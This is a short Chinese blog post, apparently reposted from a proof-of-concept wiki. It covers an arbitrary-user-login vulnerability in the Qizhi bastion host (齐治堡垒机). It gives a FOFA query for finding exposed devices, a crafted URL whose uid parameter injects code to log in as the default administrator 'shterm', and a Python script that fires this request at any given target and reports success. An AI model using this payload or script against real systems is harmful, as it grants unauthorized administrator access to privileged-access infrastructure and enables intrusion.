齐治堡垒机任意用户登录

Last updated on a year ago

齐治堡垒机存在任意用户登录漏洞

齐治堡垒机存在任意用户登录漏洞,访问特定的URL即可获得后台权限

验证

fofa app="齐治科技-堡垒机"

POC

1
http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

shterm 为缺省管理员账户。

审计员:

切换超管角色:

PY脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests,sys,re,urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# for url in open("C:/1.txt","r"):
if len(sys.argv)<2:
print("[+]Use: pyhton3 齐治科技-堡垒机.py http://ip:port")
print("[+]Explain: HADESI")
print("[+]============================")
sys.exit()

url=sys.argv[1]
url1=url+"/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm"

res = requests.get(url=url1,verify=False)
# print (res.status_code)
if res.status_code == 200 :
print(url1+">>>>>漏洞存在")

Reference

https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web应用漏洞/齐治堡垒机/齐治堡垒机 任意用户登录漏洞.md


齐治堡垒机任意用户登录
https://guosec.online/posts/f8593b1e.html
Posted on
July 12, 2021
Updated on
September 16, 2022
Licensed under
本博客所有文章除特别声明外,均采用  协议,转载请注明出处!